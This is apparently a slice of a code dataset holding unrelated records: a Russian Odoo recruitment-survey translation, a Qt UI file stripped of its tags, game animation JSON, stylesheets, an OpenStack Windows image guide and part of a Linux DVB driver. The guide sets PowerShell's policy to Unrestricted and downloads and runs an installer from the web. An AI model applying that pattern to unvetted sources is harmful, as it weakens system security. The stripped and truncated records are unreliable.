|| (n%100>=11 && n%100<=14)? 2 : 3);\\n\"\n\n#. module: hr_recruitment_survey\n#: model_terms:ir.ui.view,arch_db:hr_recruitment_survey.hr_applicant_view_form_inherit\nmsgid \"\"\n\"Print\\n\"\n\" Interview\"\nmsgstr \"\"\n\"Пчать\\n\"\n\" Интервью\"\n\n#. module: hr_recruitment_survey\n#: model_terms:ir.ui.view,arch_db:hr_recruitment_survey.hr_applicant_view_form_inherit\nmsgid \"\"\n\"Start\\n\"\n\" Interview\"\nmsgstr \"\"\n\"Начать\\n\"\n\" Интервью\"\n\n#. module: hr_recruitment_survey\n#: model:survey.question,question:hr_recruitment_survey.survey_recruitment_form_p1\n#: model:survey.question,title:hr_recruitment_survey.survey_recruitment_form_p1\nmsgid \"About you\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model:survey.question,question:hr_recruitment_survey.survey_recruitment_form_p1_q7\n#: model:survey.question,title:hr_recruitment_survey.survey_recruitment_form_p1_q7\nmsgid \"Activities\"\nmsgstr \"Деятельность\"\n\n#. module: hr_recruitment_survey\n#: model_terms:ir.ui.view,arch_db:hr_recruitment_survey.hr_applicant_view_form_inherit\nmsgid \"Answer related job question\"\nmsgstr \"Ответить на вопрос, связанный с вакансией\"\n\n#. module: hr_recruitment_survey\n#: model:ir.model,name:hr_recruitment_survey.model_hr_applicant\nmsgid \"Applicant\"\nmsgstr \"Соискатель\"\n\n#. module: hr_recruitment_survey\n#: model:ir.model.fields,field_description:hr_recruitment_survey.field_survey_survey__category\nmsgid \"Category\"\nmsgstr \"Категория\"\n\n#. module: hr_recruitment_survey\n#: model:ir.model.fields,help:hr_recruitment_survey.field_survey_survey__category\nmsgid \"\"\n\"Category is used to know in which context the survey is used. Various apps \"\n\"may define their own categories when they use survey like jobs recruitment \"\n\"or employee appraisal surveys.\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model:ir.model.fields,help:hr_recruitment_survey.field_hr_applicant__survey_id\n#: model:ir.model.fields,help:hr_recruitment_survey.field_hr_job__survey_id\nmsgid \"\"\n\"Choose an interview form for this job position and you will be able to \"\n\"print/answer this interview from all applicants who apply for this job\"\nmsgstr \"\"\n\"Выберите форму собеседования на эту должность, и вы сможете \"\n\"распечатать/провести это собеседование со всеми соискателями, претендующими \"\n\"на эту работу\"\n\n#. module: hr_recruitment_survey\n#: model:survey.question,question:hr_recruitment_survey.survey_recruitment_form_p1_q3\n#: model:survey.question,title:hr_recruitment_survey.survey_recruitment_form_p1_q3\nmsgid \"Did you apply from an employee ?\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model_terms:ir.ui.view,arch_db:hr_recruitment_survey.hr_job_survey_inherit\n#: model_terms:ir.ui.view,arch_db:hr_recruitment_survey.view_hr_job_kanban_inherit\nmsgid \"Display Interview Form\"\nmsgstr \"Открыть схему собеседования\"\n\n#. module: hr_recruitment_survey\n#: model:survey.question,question:hr_recruitment_survey.survey_recruitment_form_p1_q4\n#: model:survey.question,title:hr_recruitment_survey.survey_recruitment_form_p1_q4\nmsgid \"Education\"\nmsgstr \"Образование\"\n\n#. module: hr_recruitment_survey\n#: model:survey.question,question:hr_recruitment_survey.survey_recruitment_form_p1_q2\n#: model:survey.question,title:hr_recruitment_survey.survey_recruitment_form_p1_q2\nmsgid \"From which university did or will you graduate ?\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model:survey.label,value:hr_recruitment_survey.survey_recruitment_form_p1_q8_row2\nmsgid \"Getting on with colleagues\"\nmsgstr \"Ладить с коллегами\"\n\n#. module: hr_recruitment_survey\n#: model:survey.label,value:hr_recruitment_survey.survey_recruitment_form_p1_q8_row8\nmsgid \"Getting perks such as free parking, gym passes\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model:survey.label,value:hr_recruitment_survey.survey_recruitment_form_p1_q8_row1\nmsgid \"Having a good pay\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model:survey.label,value:hr_recruitment_survey.survey_recruitment_form_p1_q8_row3\nmsgid \"Having a nice office environment\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model:survey.label,value:hr_recruitment_survey.survey_recruitment_form_p1_q8_row7\nmsgid \"Having freebies such as tea, coffee and stationery\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model:survey.question,comments_message:hr_recruitment_survey.survey_recruitment_form_p1\n#: model:survey.question,comments_message:hr_recruitment_survey.survey_recruitment_form_p1_q1\n#: model:survey.question,comments_message:hr_recruitment_survey.survey_recruitment_form_p1_q2\n#: model:survey.question,comments_message:hr_recruitment_survey.survey_recruitment_form_p1_q3\n#: model:survey.question,comments_message:hr_recruitment_survey.survey_recruitment_form_p1_q4\n#: model:survey.question,comments_message:hr_recruitment_survey.survey_recruitment_form_p1_q5\n#: model:survey.question,comments_message:hr_recruitment_survey.survey_recruitment_form_p1_q6\n#: model:survey.question,comments_message:hr_recruitment_survey.survey_recruitment_form_p1_q7\n#: model:survey.question,comments_message:hr_recruitment_survey.survey_recruitment_form_p1_q8\nmsgid \"If other, please specify:\"\nmsgstr \"Если другое, укажите, пожалуйста:\"\n\n#. module: hr_recruitment_survey\n#: model:survey.label,value:hr_recruitment_survey.survey_recruitment_form_p1_q8_col2\nmsgid \"Important\"\nmsgstr \"Важное\"\n\n#. module: hr_recruitment_survey\n#: model:ir.model.fields,field_description:hr_recruitment_survey.field_hr_job__survey_id\n#: model_terms:ir.ui.view,arch_db:hr_recruitment_survey.view_hr_job_kanban_inherit\nmsgid \"Interview Form\"\nmsgstr \"Форма интервью\"\n\n#. module: hr_recruitment_survey\n#: model_terms:ir.ui.view,arch_db:hr_recruitment_survey.res_config_settings_view_form\nmsgid \"Interview Forms\"\nmsgstr \"Формы интервью\"\n\n#. module: hr_recruitment_survey\n#: model:ir.model,name:hr_recruitment_survey.model_hr_job\nmsgid \"Job Position\"\nmsgstr \"Должность\"\n\n#. module: hr_recruitment_survey\n#: model:survey.question,question:hr_recruitment_survey.survey_recruitment_form_p1_q6\n#: model:survey.question,title:hr_recruitment_survey.survey_recruitment_form_p1_q6\nmsgid \"Knowledge\"\nmsgstr \"Знания\"\n\n#. module: hr_recruitment_survey\n#: model:survey.label,value:hr_recruitment_survey.survey_recruitment_form_p1_q8_row6\nmsgid \"Management quality\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model_terms:ir.ui.view,arch_db:hr_recruitment_survey.view_hr_job_kanban_inherit\nmsgid \"No Interview Form\"\nmsgstr \"Без плана собеседования\"\n\n#. module: hr_recruitment_survey\n#: model:survey.label,value:hr_recruitment_survey.survey_recruitment_form_p1_q8_col1\nmsgid \"Not important\"\nmsgstr \"Неважно\"\n\n#. module: hr_recruitment_survey\n#: model:survey.label,value:hr_recruitment_survey.survey_recruitment_form_p1_q8_row5\nmsgid \"Office location\"\nmsgstr \"Расположение офиса\"\n\n#. module: hr_recruitment_survey\n#: model:survey.question,question:hr_recruitment_survey.survey_recruitment_form_p1_q5\n#: model:survey.question,title:hr_recruitment_survey.survey_recruitment_form_p1_q5\nmsgid \"Past work experiences\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model_terms:survey.survey,description:hr_recruitment_survey.survey_recruitment_form\nmsgid \"\"\n\"Please answer those questions to help recruitment officers to preprocess \"\n\"your application.\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model_terms:survey.question,description:hr_recruitment_survey.survey_recruitment_form_p1\nmsgid \"\"\n\"Please fill information about you: who you are, what are your education, experience, and activities.\\n\"\n\" It will help us managing your application.\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model_terms:survey.question,description:hr_recruitment_survey.survey_recruitment_form_p1_q4\n#: model_terms:survey.question,description:hr_recruitment_survey.survey_recruitment_form_p1_q5\nmsgid \"\"\n\"Please summarize your education history: schools, location, diplomas, ...\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model_terms:survey.question,description:hr_recruitment_survey.survey_recruitment_form_p1_q7\nmsgid \"\"\n\"Please tell us a bit more about yourself: what are your main activities, ...\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model_terms:ir.ui.view,arch_db:hr_recruitment_survey.hr_applicant_view_form_inherit\nmsgid \"Print interview report\"\nmsgstr \"Печать отчета собеседования\"\n\n#. module: hr_recruitment_survey\n#: model:ir.model.fields.selection,name:hr_recruitment_survey.selection__survey_survey__category__hr_recruitment\nmsgid \"Recruitment\"\nmsgstr \"Найм\"\n\n#. module: hr_recruitment_survey\n#: model:survey.survey,title:hr_recruitment_survey.survey_recruitment_form\nmsgid \"Recruitment Form\"\nmsgstr \"Рекрутинговая форма\"\n\n#. module: hr_recruitment_survey\n#: model:ir.model.fields,field_description:hr_recruitment_survey.field_hr_applicant__response_id\nmsgid \"Response\"\nmsgstr \"Ответ\"\n\n#. module: hr_recruitment_survey\n#: model:ir.model,name:hr_recruitment_survey.model_survey_survey\n#: model:ir.model.fields,field_description:hr_recruitment_survey.field_hr_applicant__survey_id\nmsgid \"Survey\"\nmsgstr \"Опрос\"\n\n#. module: hr_recruitment_survey\n#: model_terms:survey.survey,thank_you_message:hr_recruitment_survey.survey_recruitment_form\nmsgid \"Thank you for answering this survey. We will come back to you soon.\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model:survey.question,validation_error_msg:hr_recruitment_survey.survey_recruitment_form_p1\n#: model:survey.question,validation_error_msg:hr_recruitment_survey.survey_recruitment_form_p1_q1\n#: model:survey.question,validation_error_msg:hr_recruitment_survey.survey_recruitment_form_p1_q2\n#: model:survey.question,validation_error_msg:hr_recruitment_survey.survey_recruitment_form_p1_q3\n#: model:survey.question,validation_error_msg:hr_recruitment_survey.survey_recruitment_form_p1_q4\n#: model:survey.question,validation_error_msg:hr_recruitment_survey.survey_recruitment_form_p1_q5\n#: model:survey.question,validation_error_msg:hr_recruitment_survey.survey_recruitment_form_p1_q6\n#: model:survey.question,validation_error_msg:hr_recruitment_survey.survey_recruitment_form_p1_q7\n#: model:survey.question,validation_error_msg:hr_recruitment_survey.survey_recruitment_form_p1_q8\nmsgid \"The answer you entered is not valid.\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model:survey.question,constr_error_msg:hr_recruitment_survey.survey_recruitment_form_p1\n#: model:survey.question,constr_error_msg:hr_recruitment_survey.survey_recruitment_form_p1_q1\n#: model:survey.question,constr_error_msg:hr_recruitment_survey.survey_recruitment_form_p1_q2\n#: model:survey.question,constr_error_msg:hr_recruitment_survey.survey_recruitment_form_p1_q3\n#: model:survey.question,constr_error_msg:hr_recruitment_survey.survey_recruitment_form_p1_q4\n#: model:survey.question,constr_error_msg:hr_recruitment_survey.survey_recruitment_form_p1_q5\n#: model:survey.question,constr_error_msg:hr_recruitment_survey.survey_recruitment_form_p1_q6\n#: model:survey.question,constr_error_msg:hr_recruitment_survey.survey_recruitment_form_p1_q7\n#: model:survey.question,constr_error_msg:hr_recruitment_survey.survey_recruitment_form_p1_q8\nmsgid \"This question requires an answer.\"\nmsgstr \"Этот вопрос требует ответа.\"\n\n#. module: hr_recruitment_survey\n#: model:survey.label,value:hr_recruitment_survey.survey_recruitment_form_p1_q8_col3\nmsgid \"Very important\"\nmsgstr \"Очень важно\"\n\n#. module: hr_recruitment_survey\n#: model_terms:survey.question,description:hr_recruitment_survey.survey_recruitment_form_p1_q6\nmsgid \"What are your main knowledge regarding the job you are applying to ?\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model:survey.question,question:hr_recruitment_survey.survey_recruitment_form_p1_q8\n#: model:survey.question,title:hr_recruitment_survey.survey_recruitment_form_p1_q8\nmsgid \"What is important for you ?\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model:survey.question,question:hr_recruitment_survey.survey_recruitment_form_p1_q1\n#: model:survey.question,title:hr_recruitment_survey.survey_recruitment_form_p1_q1\nmsgid \"Which country are you from ?\"\nmsgstr \"\"\n\n#. module: hr_recruitment_survey\n#: model:survey.label,value:hr_recruitment_survey.survey_recruitment_form_p1_q8_row4\nmsgid \"Working with state of the art technology\"\nmsgstr \"\"\n"} {"text": "\n\n QmitkMicronTrackerWidget\n \n \n \n 0\n 0\n 321\n 181\n \n \n \n \n \n \n <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">\n<html><head><meta name="qrichtext" content="1" /><style type="text/css">\np, li { white-space: pre-wrap; }\n</style></head><body style=" font-family:'MS Shell Dlg 2'; font-size:8pt; font-weight:400; font-style:normal;">\n<p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;"><span style=" text-decoration: underline;">MicronTracker</span></p></body></html>\n \n \n \n \n \n \n \n \n \n \n Calibration File: <none>\n \n \n \n \n \n \n \n \n Set Calibration File\n \n \n \n \n \n \n Qt::Horizontal\n \n \n \n 40\n 20\n \n \n \n \n \n \n \n \n \n Qt::Horizontal\n \n \n \n 40\n 20\n \n \n \n \n \n \n \n Qt::Vertical\n \n \n \n 20\n 40\n \n \n \n \n \n \n \n \n \n \n \n \n 120\n 50\n \n \n \n \n 120\n 80\n \n \n \n \n 120\n 0\n \n \n \n <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">\n<html><head><meta name="qrichtext" content="1" /><style type="text/css">\np, li { white-space: pre-wrap; }\n</style></head><body style=" font-family:'MS Shell Dlg 2'; font-size:7.8pt; font-weight:400; font-style:normal;" bgcolor="#000000">\n<p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;"><span style=" font-size:8pt;"> </span></p>\n<p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;"><span style=" font-size:8pt;"> </span></p>\n<p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;"><span style=" font-size:8pt; text-decoration: underline; color:#ffffff;">output:</span><span style=" font-size:8pt;"> </span></p></body></html>\n \n \n Qt::NoTextInteraction\n \n \n \n \n \n \n \n 120\n 0\n \n \n \n \n 120\n 16777215\n \n \n \n \n 120\n 0\n \n \n \n test connection\n \n \n \n \n \n \n \n \n \n \n Qt::Vertical\n \n \n \n 20\n 40\n \n \n \n \n \n \n \n \n\n"} {"text": "{\n\t\"format_version\" : \"1.8.0\",\n\t\"animations\" : {\n\t\t\"animation.{{IDENTIFIER}}.flying\" : {\n\t\t\t\"loop\" : true,\n\t\t\t\"bones\" : {\n\t\t\t\t\"body\" : {\n\t\t\t\t\t\"position\" : [ 0.0, \"math.cos(query.life_time * 343.774) * 1.6\", 0.0 ],\n\t\t\t\t\t\"rotation\" : [ \"45.0 - math.cos(query.life_time * 1489.6) * 8.59\", 0.0, 0.0 ]\n\t\t\t\t},\n\t\t\t\t\"head\" : {\n\t\t\t\t\t\"position\" : [ \"-this\", \"math.cos(query.life_time * 343.774) * 1.6 - this\", \"-this\" ],\n\t\t\t\t\t\"rotation\" : [ \"query.target_x_rotation\", \"query.target_y_rotation\", 0.0 ]\n\t\t\t\t},\n\t\t\t\t\"leftwing\" : {\n\t\t\t\t\t\"position\" : [ \"-this\", \"-this\", \"-this\" ],\n\t\t\t\t\t\"rotation\" : [ 0.0, \"math.cos(query.life_time * 1489.6) * -45.0\", 0.0 ]\n\t\t\t\t},\n\t\t\t\t\"leftwingtip\" : {\n\t\t\t\t\t\"rotation\" : [ 0.0, \"math.cos(query.life_time * 1489.6) * -22.0\", 0.0 ]\n\t\t\t\t},\n\t\t\t\t\"rightwing\" : {\n\t\t\t\t\t\"position\" : [ \"-this\", \"-this\", \"-this\" ],\n\t\t\t\t\t\"rotation\" : [ 0.0, \"math.cos(query.life_time * 1489.6) * 45.0\", 0.0 ]\n\t\t\t\t},\n\t\t\t\t\"rightwingtip\" : {\n\t\t\t\t\t\"rotation\" : [ 0.0, \"math.cos(query.life_time * 1489.6) * 22.0\", 0.0 ]\n\t\t\t\t}\n\t\t\t}\n\t\t},\n\t\t\"animation.{{IDENTIFIER}}.resting\" : {\n\t\t\t\"loop\" : true,\n\t\t\t\"bones\" : {\n\t\t\t\t\"body\" : {\n\t\t\t\t\t\"position\" : [ 0.0, -0.035, 0.0 ],\n\t\t\t\t\t\"rotation\" : [ 180.0, 0.0, 0.0 ]\n\t\t\t\t},\n\t\t\t\t\"head\" : {\n\t\t\t\t\t\"position\" : [ 0.0, -0.035, 0.0 ],\n\t\t\t\t\t\"rotation\" : [ \"query.target_x_rotation\", \"180.0f - query.target_y_rotation\", 180.0 ]\n\t\t\t\t},\n\t\t\t\t\"leftwing\" : {\n\t\t\t\t\t\"position\" : [ 3.0, 0.0, 3.0 ],\n\t\t\t\t\t\"rotation\" : [ -9.0, 72.0, 0.0 ]\n\t\t\t\t},\n\t\t\t\t\"leftwingtip\" : {\n\t\t\t\t\t\"rotation\" : [ 0.0, 99.0, 0.0 ]\n\t\t\t\t},\n\t\t\t\t\"rightwing\" : {\n\t\t\t\t\t\"position\" : [ -3.0, 0.0, 3.0 ],\n\t\t\t\t\t\"rotation\" : [ -9.0, -72.0, 0.0 ]\n\t\t\t\t},\n\t\t\t\t\"rightwingtip\" : {\n\t\t\t\t\t\"rotation\" : [ 0.0, -99.0, 0.0 ]\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n}\n"} {"text": "# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright 2012 United States Government as represented by the\n# Administrator of the National Aeronautics and Space Administration.\n# All Rights Reserved.\n#\n# Copyright 2012 Nebula, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport logging\n\nfrom horizon import tabs\n\nfrom .tabs import SystemInfoTabs\n\n\nLOG = logging.getLogger(__name__)\n\n\nclass IndexView(tabs.TabbedTableView):\n tab_group_class = SystemInfoTabs\n template_name = 'admin/info/index.html'\n"} {"text": "/**\n * Copyright 2016-present, Baifendian, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n */\n\n@import '../variables.less';\n\n@duration: .2s;\n@zIndex: 1000;\n\n.bfd-modal--scrollbar-measure {\n position: absolute;\n top: -9999px;\n width: 50px;\n height: 50px;\n overflow: scroll;\n}\n\nbody.bfd-modal--open {\n overflow: hidden;\n}\n\n.bfd-modal {\n display: none;\n backface-visibility: hidden;\n}\n\n.bfd-modal__backdrop {\n position: fixed;\n top: 0;\n right: 0;\n bottom: -1px;\n left: 0;\n opacity: 0;\n transition: all @duration;\n z-index: @zIndex;\n background-color: rgba(0, 0, 0, .8);\n}\n\n.bfd-modal__modal {\n position: fixed;\n top: 0;\n right: 0;\n bottom: 0;\n left: 0;\n z-index: @zIndex;\n -webkit-overflow-scrolling: touch;\n outline: 0;\n overflow-x: hidden;\n overflow-y: auto;\n\n}\n\n.bfd-modal__modal-dialog {\n margin: 100px auto;\n width: 600px;\n transition: all @duration;\n}\n\n.bfd-modal__modal-dialog--lock {\n animation: bfd-modal-shake .8s;\n}\n\n@keyframes bfd-modal-shake {\n 10%, 90% {\n transform: translate3d(-1px, 0, 0);\n }\n\n 20%, 80% {\n transform: translate3d(2px, 0, 0);\n }\n\n 30%, 50%, 70% {\n transform: translate3d(-4px, 0, 0);\n }\n\n 40%, 60% {\n transform: translate3d(4px, 0, 0);\n }\n}\n\n.bfd-modal__modal-content {\n opacity: 0;\n transform: scale(.98) translate3d(0, -10%, 0);\n transform-origin: top;\n transition: all @duration;\n}\n\n.bfd-modal--sm {\n .bfd-modal__modal-dialog {\n width: 300px;\n }\n}\n\n.bfd-modal--lg {\n .bfd-modal__modal-dialog {\n width: 1000px;\n }\n}\n\n.bfd-modal__modal-header {\n background-color: @primary-color-deep;\n color: #fff;\n padding: 15px 20px;\n position: relative;\n border-top-left-radius: 2px;\n border-top-right-radius: 2px;\n h1, h2, h3, h4, h5, h6 {\n margin: 0;\n padding: 0;\n font-weight: normal;\n font-size: 14px;\n }\n}\n\n.bfd-modal__modal-header-close {\n position: absolute;\n top: 50%;\n right: 15px;\n margin-top: -11px;\n}\n\n.bfd-modal__modal-body {\n border-bottom-left-radius: 2px;\n border-bottom-right-radius: 2px;\n padding: 20px;\n background-color: #fff;\n}\n\ndiv.bfd-modal--open {\n .bfd-modal__backdrop {\n opacity: .6;\n }\n .bfd-modal__modal-content {\n opacity: 1;\n transform: scale(1) translate3d(0, 0, 0);\n }\n}\n"} {"text": ".App {\n text-align: center;\n}\n\n.App-logo {\n animation: App-logo-spin infinite 20s linear;\n height: 80px;\n}\n\n.App-header {\n background-color: #222;\n height: 150px;\n padding: 20px;\n color: white;\n}\n\n.App-intro {\n font-size: large;\n}\n\n@keyframes App-logo-spin {\n from { transform: rotate(0deg); }\n to { transform: rotate(360deg); }\n}\n"} {"text": "================================\nExample: Microsoft Windows image\n================================\n\nThis example creates a Windows Server 2012 qcow2 image,\nusing the :command:`virt-install` command and the KVM hypervisor.\n\n#. Follow these steps to prepare the installation:\n\n #. Download a Windows Server 2012 installation ISO.\n Evaluation images are available on the `Microsoft website\n `_ (registration required).\n #. Download the signed VirtIO drivers ISO from the `Fedora website\n `_.\n #. Create a 15 GB qcow2 image:\n\n .. code-block:: console\n\n $ qemu-img create -f qcow2 ws2012.qcow2 15G\n\n#. Start the Windows Server 2012 installation with the\n :command:`virt-install` command:\n\n .. code-block:: console\n\n # virt-install --connect qemu:///system \\\n --name ws2012 --ram 2048 --vcpus 2 \\\n --network network=default,model=virtio \\\n --disk path=ws2012.qcow2,format=qcow2,device=disk,bus=virtio \\\n --cdrom /path/to/en_windows_server_2012_x64_dvd.iso \\\n --disk path=/path/to/virtio-win-0.1-XX.iso,device=cdrom \\\n --vnc --os-type windows --os-variant win2k12 \\\n --os-distro windows --os-version 2012\n\n Use :command:`virt-manager` or :command:`virt-viewer` to\n connect to the VM and start the Windows installation.\n\n#. Enable the VirtIO drivers. By default, the Windows installer does not detect\n the disk.\n\n#. Load VirtIO SCSI drivers and network drivers by choosing an installation\n target when prompted. Click :guilabel:`Load driver` and browse the file\n system.\n\n#. Select the ``E:\\virtio-win-0.1XX\\viostor\\2k12\\amd64`` folder. The Windows\n installer displays a list of drivers to install.\n\n#. Select the VirtIO SCSI drivers.\n\n#. Click :guilabel:`Load driver` and browse the file system, and\n select the ``E:\\NETKVM\\2k12\\amd64`` folder.\n\n#. Select the network drivers, and continue the installation. Once the\n installation is completed, the VM restarts.\n\n#. Define a password for the administrator when prompted.\n\n#. Log in as administrator and start a command window.\n\n#. Complete the VirtIO drivers installation by running the\n following command:\n\n .. code-block:: console\n\n C:\\pnputil -i -a E:\\virtio-win-0.1XX\\viostor\\2k12\\amd64\\*.INF\n\n#. To allow the :term:`Cloudbase-Init` to run scripts during an instance\n boot, set the PowerShell execution policy to be unrestricted:\n\n .. code-block:: console\n\n C:\\powershell\n C:\\Set-ExecutionPolicy Unrestricted\n\n#. Download and install the ``Cloudbase-Init``:\n\n .. code-block:: console\n\n C:\\Invoke-WebRequest -UseBasicParsing https://cloudbase.it/downloads/CloudbaseInitSetup_Stable_x64.msi -OutFile cloudbaseinit.msi\n C:\\.\\cloudbaseinit.msi\n\n In the :guilabel:`configuration options` window,\n change the following settings:\n\n * Username: ``Administrator``\n * Network adapter to configure: ``Red Hat VirtIO Ethernet Adapter``\n * Serial port for logging: ``COM1``\n\n When the installation is done, in the\n :guilabel:`Complete the Cloudbase-Init Setup Wizard` window,\n select the :guilabel:`Run Sysprep` and :guilabel:`Shutdown`\n check boxes and click :guilabel:`Finish`.\n\n Wait for the machine shutdown.\n\nYour image is ready to upload to the Image service:\n\n.. code-block:: console\n\n $ openstack image create --disk-format qcow2 --file ws2012.qcow2 WS2012\n"} {"text": "/**\n * \n * WARNING! This file was autogenerated by: \n * _ _ _ _ __ __ \n * | | | | | | |\\ \\ / / \n * | | | | |_| | \\ V / \n * | | | | _ | / \\ \n * | |_| | | | |/ /^\\ \\ \n * \\___/\\_| |_/\\/ \\/ \n * \n * This file was autogenerated by UnrealHxGenerator using UHT definitions.\n * It only includes UPROPERTYs and UFUNCTIONs. Do not modify it!\n * In order to add more definitions, create or edit a type with the same name/package, but with an `_Extra` suffix\n**/\npackage unreal.mediaplayereditor;\n\n/**\n WARNING: This type was not defined as DLL export on its declaration. Because of that, some of its methods are inaccessible\n \n Implements a factory for UFileMediaSource objects.\n**/\n@:umodule(\"MediaPlayerEditor\")\n@:glueCppIncludes(\"Private/Factories/FileMediaSourceFactoryNew.h\")\n@:noClass @:uextern @:uclass extern class UFileMediaSourceFactoryNew extends unreal.editor.UFactory {\n \n}\n"} {"text": "/*\n * dvb_ca.c: generic DVB functions for EN50221 CAM interfaces\n *\n * Copyright (C) 2004 Andrew de Quincey\n *\n * Parts of this file were based on sources as follows:\n *\n * Copyright (C) 2003 Ralph Metzler \n *\n * based on code:\n *\n * Copyright (C) 1999-2002 Ralph Metzler\n * & Marcus Metzler for convergence integrated media GmbH\n *\n * This program is free software; you can redistribute it and/or\n * modify it under the terms of the GNU General Public License\n * as published by the Free Software Foundation; either version 2\n * of the License, or (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program; if not, write to the Free Software\n * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\n * Or, point your browser to http://www.gnu.org/copyleft/gpl.html\n */\n\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n#include \"dvb_ca_en50221.h\"\n#include \"dvb_ringbuffer.h\"\n\nstatic int dvb_ca_en50221_debug;\n\nmodule_param_named(cam_debug, dvb_ca_en50221_debug, int, 0644);\nMODULE_PARM_DESC(cam_debug, \"enable verbose debug messages\");\n\n#define dprintk if (dvb_ca_en50221_debug) printk\n\n#define INIT_TIMEOUT_SECS 10\n\n#define HOST_LINK_BUF_SIZE 0x200\n\n#define RX_BUFFER_SIZE 65535\n\n#define MAX_RX_PACKETS_PER_ITERATION 10\n\n#define CTRLIF_DATA 0\n#define CTRLIF_COMMAND 1\n#define CTRLIF_STATUS 1\n#define CTRLIF_SIZE_LOW 2\n#define CTRLIF_SIZE_HIGH 3\n\n#define CMDREG_HC 1\t/* Host control */\n#define CMDREG_SW 2\t/* Size write */\n#define CMDREG_SR 4\t/* Size read */\n#define CMDREG_RS 8\t/* Reset interface */\n#define CMDREG_FRIE 0x40\t/* Enable FR interrupt */\n#define CMDREG_DAIE 0x80\t/* Enable DA interrupt */\n#define IRQEN (CMDREG_DAIE)\n\n#define STATUSREG_RE 1\t/* read error */\n#define STATUSREG_WE 2\t/* write error */\n#define STATUSREG_FR 0x40\t/* module free */\n#define STATUSREG_DA 0x80\t/* data available */\n#define STATUSREG_TXERR (STATUSREG_RE|STATUSREG_WE)\t/* general transfer error */\n\n\n#define DVB_CA_SLOTSTATE_NONE 0\n#define DVB_CA_SLOTSTATE_UNINITIALISED 1\n#define DVB_CA_SLOTSTATE_RUNNING 2\n#define DVB_CA_SLOTSTATE_INVALID 3\n#define DVB_CA_SLOTSTATE_WAITREADY 4\n#define DVB_CA_SLOTSTATE_VALIDATE 5\n#define DVB_CA_SLOTSTATE_WAITFR 6\n#define DVB_CA_SLOTSTATE_LINKINIT 7\n\n\n/* Information on a CA slot */\nstruct dvb_ca_slot {\n\n\t/* current state of the CAM */\n\tint slot_state;\n\n\t/* mutex used for serializing access to one CI slot */\n\tstruct mutex slot_lock;\n\n\t/* Number of CAMCHANGES that have occurred since last processing */\n\tatomic_t camchange_count;\n\n\t/* Type of last CAMCHANGE */\n\tint camchange_type;\n\n\t/* base address of CAM config */\n\tu32 config_base;\n\n\t/* value to write into Config Control register */\n\tu8 config_option;\n\n\t/* if 1, the CAM supports DA IRQs */\n\tu8 da_irq_supported:1;\n\n\t/* size of the buffer to use when talking to the CAM */\n\tint link_buf_size;\n\n\t/* buffer for incoming packets */\n\tstruct dvb_ringbuffer rx_buffer;\n\n\t/* timer used during various states of the slot */\n\tunsigned long timeout;\n};\n\n/* Private CA-interface information */\nstruct dvb_ca_private {\n\n\t/* pointer back to the public data structure */\n\tstruct dvb_ca_en50221 *pub;\n\n\t/* the DVB device */\n\tstruct dvb_device *dvbdev;\n\n\t/* Flags describing the interface (DVB_CA_FLAG_*) */\n\tu32 flags;\n\n\t/* number of slots supported by this CA interface */\n\tunsigned int slot_count;\n\n\t/* information on each slot */\n\tstruct dvb_ca_slot *slot_info;\n\n\t/* wait queues for read() and write() operations */\n\twait_queue_head_t wait_queue;\n\n\t/* PID of the monitoring thread */\n\tstruct task_struct *thread;\n\n\t/* Flag indicating if the CA device is open */\n\tunsigned int open:1;\n\n\t/* Flag indicating the thread should wake up now */\n\tunsigned int wakeup:1;\n\n\t/* Delay the main thread should use */\n\tunsigned long delay;\n\n\t/* Slot to start looking for data to read from in the next user-space read operation */\n\tint next_read_slot;\n\n\t/* mutex serializing ioctls */\n\tstruct 